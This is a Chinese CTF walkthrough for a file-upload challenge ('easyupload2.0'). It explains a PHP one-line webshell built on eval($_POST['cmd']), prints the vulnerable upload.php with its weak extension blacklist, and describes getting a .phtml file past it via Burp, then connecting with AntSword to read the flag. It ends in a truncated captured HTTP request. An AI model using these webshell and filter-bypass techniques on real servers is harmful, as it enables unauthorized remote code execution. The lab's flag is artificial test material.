一马

ctfhub_web_文件上传_全通关教程(持续更新中) - FreeBuf网络安全行业门户

文件上传(文件头绕过)

例题1 easyupload2.0

方法1

是php的固定规范写法

@表示后面如果执行错误不会报错

eval()函数表示括号里的语句字符串为执行代码

&_POST[‘cmd’]表示从页面中以post方式接受变量cmd

cmd是蚁剑的连接密码

先写一个1.txt 一句话木马

然后改成1.png,因为只能上传照片格式,

然后用burp抓包截取,将jpg改成php

发现他过滤了php

upload.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
< ?php
session_start();
echo
"
< meta
charset =\"utf-8\">";
if (!isset($_SESSION['user'])){
$_SESSION['user'] = md5((string)time().(string)rand(100, 1000));
}
if (isset($_FILES['uploaded']))
{
$target_path = "./upload";
$t_path = $target_path.
"/".basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
$uploaded_tmp = $_FILES['uploaded']['tmp_name'];

if (preg_match("/php|hta|ini/i", $uploaded_ext))
{
    die("php是不行滴");
}
else
{
$content = file_get_contents($uploaded_tmp);
move_uploaded_file($uploaded_tmp, $t_path);
echo
"{$t_path} succesfully uploaded!";
}
}
else
{
    die("不传🐎还想要f1ag?");
}
? >

php3,php5,pht,phtml,phps都是php可运行的文件扩展名

于是修改文件扩展名为.phtml成功上传

注意这里改完放包之后要禁用拦截,否则网页还会一直加载

接下来用中国蚁剑连接

密码就是POST传入的数据

添加数据后,在3w里面找到flag.php

NSSCTF{810efa32-9305-4a57-a665-969f34d90749}

方法2

传入

这样搞的话就可以访问文件直接进phpinfo();

然后访问这个网页

ctrl+F 搜索网页文本

得到flag

POST

POST /upload.php HTTP/1.1
Host: node4.anna.nssctf.cn:28128
Content-Length: 294
Cache-Control: max-age=0
Origin: http://node4.anna.nssctf.cn:28128
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaJYMnfi8JLJdTfbu
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node4.anna.nssctf.cn:28128/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_648a44a949074de73151ffaa0a832aec=1740560840,1741511209; HMACCOUNT=9B0CB3FE954795E1; Hm_lpvt_648a44a949074de73151ffaa0a832aec=1741511219; PHPSESSID=kogpi8bg9liflpkkag5ra1eor6
Connection: close

------WebKitFormBoundd
#WEB
一马
http://example.com/2024/04/27/一句话木马/
Author
chaye
Posted on
April 27, 2024
Licensed under